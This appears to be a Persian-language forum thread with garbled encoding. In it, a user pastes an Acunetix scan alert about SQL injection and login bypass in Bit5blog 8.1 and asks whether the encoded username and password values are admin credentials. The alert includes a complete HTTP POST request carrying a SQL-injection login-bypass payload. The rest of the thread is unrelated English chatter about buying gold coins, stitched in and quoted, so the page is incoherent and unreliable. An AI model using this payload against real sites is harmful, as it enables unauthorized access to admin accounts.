Collapse
X

• Filter
  • زمان
  • Show
Clear All

• سوالی در مورد Ù‡Ú© سایت

با سلام و تبريک سال جديد
    دوستان گرامی بنده سايتي را با Acunetix Web Vulnerability Scanner اسکن کردم و در قسمت alert چند مورد پيدا کرد که در اينجا 1 مورد را قرار ميدم که اگر راهنمايي بفرماييد ممنون ميشم.

Bit5blog v.8.1 SQL Injection and Login Bypass

Vulnerability de******ion
    1) Input passed to the "username" and "password" parameters in "processlogin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed to the "comment" parameter in "addcomment.php" isn't properly sanitised before being used. This can be exploited to inject arbitrary ****** code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.

Example: <a href="**********:">[text]</a>

Confirmed in version 8.1. Other versions may also be affected.
    This vulnerability affects /html/admin/processlogin.php.
    The impact of this vulnerability
    A remote user can execute SQL commands on the underlying database, bypass login sequence and inject arbitrary ****** code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.

Attack details
    No details are available.

View HTTP headers
    Request
    POST /html/admin/processlogin.php HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: ******
    Content-Length: 75
    Connection: Close
    Pragma: no-cache

username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*

Response
    HTTP/1.0 302 Moved Temporarily
    Date: Wed, 04 Apr 2007 1915 GMT
    Server: Apache Powered Server
    X-Powered-By: PHP/4.3.10-19
    Set-****ie: POSTNUKESID=9784a42198ce619d7e937bf02958fadb; path=/html/admin
    Expires: Thu, 19 Nov 1981 0800 GMT
    Cache-Control: cache
    Pragma: no-cache
    Content-Type: text/html
    X-Cache: MISS from Cache
    X-Cache-Lookup: MISS from Cache:3128
    Connection: close View HTML response

Launch the attack with HTTP Editor
    How to fix this vulnerability
    Edit the source code to ensure that input is properly sanitised.

Web references
    Secunia SA18464
    Product Homepage

چند مورد ديگر رو هم بعدا قرار ميدم تو اين مطالب يه قسمتي اشاره به user و pass هم داره آيا اينها ماله مديريت هست که بايد decode بشه؟؟
    username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*

اسم سايت را به صورت ****** قرار دادم.

با سپاس از راهنمايي شما

I understand now why some of the banks are in trouble I went into the local Bank of America on Fri. for some info. I told the clerk I needed to know if they sold gold coins ( I wasnt sure if they did) He said oh yes we have some of the new gold president coins. I then told no I want a real gold coin and not the play things He calls over the Manager and I get the same story he told me. After I explained to her I was looking for prices on "Gold Coins" I think she understood and told me no. Maybe we will make it out of this mess but no sure :D

bye
    cruxyn
    j800mz

Comment

نوشته اصلی توسط cruxyn نمایش پست ها
      i understand now why some of the banks are in trouble i went into the local bank of america on fri. For some info. I told the clerk i needed to know if they sold gold coins ( i wasnt sure if they did) he said oh yes we have some of the new gold president coins. I then told no i want a real gold coin and not the play things he calls over the manager and i get the same story he told me. After i explained to her i was looking for prices on "gold coins" i think she understood and told me no. Maybe we will make it out of this mess but no sure :d

bye
      cruxyn
      j800mz
      قديم 04-08-2007, 04:24 am
      (◕‿◕)

Comment

Working...
      X